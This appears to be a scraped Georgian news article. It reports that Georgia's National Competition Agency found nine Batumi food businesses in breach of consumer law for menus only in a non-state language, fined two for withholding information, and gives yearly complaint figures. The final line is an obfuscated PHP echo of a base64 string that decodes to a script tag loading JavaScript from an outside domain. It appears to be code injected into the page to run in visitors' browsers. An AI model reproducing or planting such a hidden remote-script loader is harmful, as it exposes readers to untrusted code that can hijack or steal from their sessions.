celsiusi
ავერსი შნაიდერი

საქართველოს კონკურენციის ეროვნული სააგენტოს ინფორმაციით, სააგენტომ ბათუმში, კვებითი მომსახურების სექტორში, „მომხმარებლის უფლებების დაცვის შესახებ“ საქართველოს კანონის შესაძლო დარღვევის ფაქტებზე, 11 მოვაჭრის მიმართ დაწყებული საკითხის შესწავლა დაასრულა.

„სააგენტოს მიერ მიღებული და დამუშავებული მასალებიდან დადგინდა, რომ შპს „ქიზილ 2023“-ის, შპს „გრილ ფუდის“, შპს „ჰარვიდენტის“, შპს „დარიას“, ი/მ ანდრეი ხარბედიას,  ი/მ ვლადისლავ კირიაკოვის, ი/მ ალექსანდრ ვასილევის, შპს „ინვესტ ინ ჯორჯიას“ და ი/მ მარია კალუსტიანის კუთვნილ ობიექტებში, საცნობარო (კვების) მენიუ შედგენილი და განთავსებული იყო მხოლოდ არასახელმწიფო ენაზე. შესაბამისად, კვების ობიექტებში შესულ მომხმარებლებს არ ჰქონდათ შესაძლებლობა, სახელმწიფო ენაზე, მკაფიოდ და გასაგებად მიეღოთ ინფორმაცია. შესაბამისად, სააგენტომ, საქმის გარემოებებისა, წარმოდგენილი მტკიცებულებების შეფასებისა და შესწავლის შედეგად, ხსენებული მოვაჭრეების მიერ „მომხმარებლის უფლებების დაცვის შესახებ“ საქართველოს კანონის დარღვევის ფაქტი დაადგინა. სააგენტოს გადაწყვეტილებებით, მოვაჭრეებს დაევალათ ერთი თვის განმავლობაში სავაჭრო პოლიტიკა კანონის შესაბამისი მუხლის მოთხოვნებს შეუსაბამოს.

ამასთან, შპს „დანოს“ და შპს „მაქსი სედვიჩ ჩიქენის“ მხრიდან ზემოხსენებული დარღვევის ფაქტი არ დადასტურდა.

საკითხის შესწავლის პროცესში, რელევანტური გარემოებების დადგენა-დაზუსტების მიზნით, სააგენტოს მიერ მოთხოვნილი ინფორმაციის დადგენილ ვადაში მიუწოდებლობისთვის, შპს „გრილ ფუდს“ და შპს „ჰარვიდენტს“ ჯარიმა დაეკისრათ, თითოეულს 500 ლარის ოდენობით. დღეის მდგომარეობით, შპს „გრილ ფუდის“ მიერ ხსენებული ჯარიმა გადახდილია.

კონკურენციის ეროვნულმა სააგენტოს ცნობით, მომხმარებელთა უფლებების დაცვის მიმართულებით, 2022 წლის პირველი ნოემბრიდან 2023 წლის პირველ ნოემბრამდე, სააგენტოში 462 განაცხადი დაფიქსირდა, საიდანაც 251 განცხადებაზე საქმის შესწავლა დაიწყო. აღნიშნულ პერიოდში, მომხმარებლის სასარგებლოდ, პირობითი ვალდებულების აღების შესახებ 117 საქმეზე 77 შეთანხმება გაფორმდა. საანგარიშო პერიოდში დადასტურდა მომხმარებელთა ჯგუფის უფლების 38 დარღვევის ფაქტი – 53 საქმეზე, ხოლო შვიდ შემთხვევაში დარღვევა არ დადასტურდა.

250
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");